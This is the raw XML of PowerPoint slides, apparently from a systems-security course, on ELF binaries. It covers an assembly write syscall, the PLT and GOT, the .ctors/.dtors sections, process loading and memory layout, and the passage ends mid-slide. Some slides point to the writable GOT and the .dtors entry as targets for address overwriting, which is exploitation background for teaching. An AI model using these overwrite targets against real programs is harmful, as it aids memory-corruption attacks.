              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$1,%ebx	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$12,%edx	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		$0x80	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11249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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PLT and GOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a shared library function is called by a program the address called is an entry in the Procedure Linking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Table (PLT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address contains an indirect jump to the addresses contained in variables stored in the Global Offset Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first time a function is called, the GOT address is a jump back to the PLT, where the code to invoke the linker is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker does its magic and updates the GOT entry, so next time the function is called it can be directly invoked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PLT is read-only, but the GOT is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5132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8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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The .dtors Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF format includes a number of sections with special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>meaning </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ctors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sections contain code to be executed before the actual program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sections contain code to be executed after the actual program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> section is not read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section is a list of four-byte addresses (starts with 0xffffffff and ends with 0x00000000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first address after the 0xffffffff is a good target for address overwriting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1958849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9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9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9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9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9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9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Loading and Execution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When a program is invoked, the operating system creates a process to execute the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The ELF file is parsed and parts are copied into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In Linux /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>maps shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the memory layout of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relocation of objects and reference resolution is performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The instruction pointer is set to the location specified as the start address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Execution begins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145370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Memory Layout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="3375621"/>
            <a:ext cx="2331843" cy="2146091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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3GB Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130215" y="2565357"/>
            <a:ext cx="2331843" cy="81026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1GB Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020450" y="2074112"/>
            <a:ext cx="530915" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681943" y="5249450"/>
            <a:ext cx="1338828" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2941180" y="2552040"/>
            <a:ext cx="1189035" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xffffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042507" y="3375620"/>
            <a:ext cx="1044517" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xbfffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690960" y="3061035"/>
            <a:ext cx="1326004" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xc0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55708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P spid="11" grpId="0"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Process Structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Environment/Argument section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for environment data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for the command line data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for local parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for saving the processor status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory-mapping segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for shared libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for dynamically allocated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data section (Static/global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initialized variables (.data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uninitialized variables (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code/Text section (.text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Marked read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modifications causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>segfaults</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985092" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5495261"/>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Code (.text)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985093" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5209511"/>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Data (.data)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985094" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175086"/>
            <a:ext cx="2590800" cy="507121"/>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endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985095" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="2317834"/>
            <a:ext cx="0" cy="342900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sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985096" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2317834"/>
            <a:ext cx="0" cy="342900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sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985097" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175085"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985098" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5813970" y="3290461"/>
            <a:ext cx="3175" cy="34290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latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985099" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5095324" y="5724937"/>
            <a:ext cx="2278188" cy="276999"/>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it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0x00800000)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985100" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5103181" y="2063920"/>
            <a:ext cx="2134495" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
